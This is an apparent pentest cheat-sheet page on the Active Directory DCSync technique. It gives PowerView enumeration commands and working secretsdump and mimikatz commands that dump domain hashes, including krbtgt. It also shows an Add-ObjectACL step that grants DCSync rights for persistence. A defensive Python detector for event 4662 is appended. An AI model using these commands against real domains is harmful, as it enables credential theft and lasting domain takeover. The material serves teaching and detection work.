DC Synchronization
The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled. By default only Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups have the required privileges (Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes in Filtered Set).
Enumeration
With PowerView (a PowerSploit script; note that there are two versions, old and new), enumerate the principals that hold the required rights on the domain object.
Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
Get-ObjectACL "DC=security,DC=local" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')}
Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.IdentityReference -match "<USER>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
We can take the individual SIDs and attempt to identify the related User Principal Names (UPNs).
Get-ObjectAcl -Identity "dc=security,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "<SID>"}
wmic useraccount get name,sid
Attack
Linux
With impacket-secretsdump.
secretsdump.py -just-dc <Domain>/<User>:<Password>@<IP> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] # Dump only that user
[-hashes <NTLM_HASH>] # Authenticate with an NTLM hash instead of a password
[-pwd-last-set] # Show when each account's password was last changed
[-just-dc-ntlm] # Only NTLM hashes
[-user-status] # Show whether a user is disabled
[-history] # Dump password history, which may help offline password cracking
Windows
With mimikatz
lsadump::dcsync /domain:<Domain> /user:<User-Whose-Hash-To-Dump>
lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:security.local /user:new_admin
lsadump::dcsync /user:security\krbtgt
Persistence
PowerView (a PowerSploit script; note that there are two versions, old and new) can be used to grant a user object the DCSync rights on the domain object for later use.
Add-ObjectACL -TargetDistinguishedName "DC=Security,DC=local" -PrincipalSamAccountName 'user' -Rights DCSync
Add-ObjectACL -PrincipalIdentity <USER> -Rights DCSync
Check
Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match "user"}
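Detection counterpart, added here as an example and not part of the original page: flag Windows Security event 4662 entries in which one of the replication control-access rights above is exercised by anything other than a known domain controller's machine account. The flattened log format, the forwarder producing it, and the account names are constructed for the sample.

```python
import re

# Schema GUIDs of the control-access rights DCSync needs (well-known AD values):
# DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, -In-Filtered-Set.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "89e95b76-444d-4c62-991a-0facbeda640c",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit in the 4662 AccessMask
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample: 4662 events flattened to "key=value; ..." by a hypothetical
# forwarder. Real 4662s require Audit Directory Service Access plus a SACL on the domain object.
SAMPLE_LOG = [
    "EventID=4662; SubjectUserName=DC01$; AccessMask=0x100; ObjectName=DC=security,DC=local; "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=new_admin; AccessMask=0x100; ObjectName=DC=security,DC=local; "
    "Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; SubjectUserName=jdoe; AccessMask=0x10; ObjectName=CN=jdoe,CN=Users,DC=security,DC=local; "
    "Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",  # unrelated GUID, no control access
    "EventID=4624; SubjectUserName=jdoe; LogonType=3",
]

def parse_event(line):
    """Split one flattened event line into a field dict (values may contain '=')."""
    fields = {}
    for part in line.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields

def is_dcsync(event, known_dcs):
    """A 4662 exercising a replication control-access right from an account
    that is not one of the domain controllers listed in known_dcs."""
    if event.get("EventID") != "4662":
        return False
    try:
        mask = int(event.get("AccessMask", "0"), 16)
    except ValueError:
        return False
    guids = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    if not (mask & CONTROL_ACCESS) or not (guids & REPLICATION_GUIDS):
        return False
    subject = event.get("SubjectUserName", "")
    # DCs replicate with their machine account (trailing '$'); anything else is suspect
    return not (subject.endswith("$") and subject.rstrip("$").upper() in known_dcs)

def find_dcsync(lines, known_dcs):
    """Subject accounts of events that look like DCSync, in log order."""
    return [e["SubjectUserName"] for e in map(parse_event, lines) if is_dcsync(e, known_dcs)]
```

Running find_dcsync(SAMPLE_LOG, {"DC01"}) returns only new_admin; the DC01$ replication is treated as expected traffic, while the same event from an unlisted machine account would still be flagged.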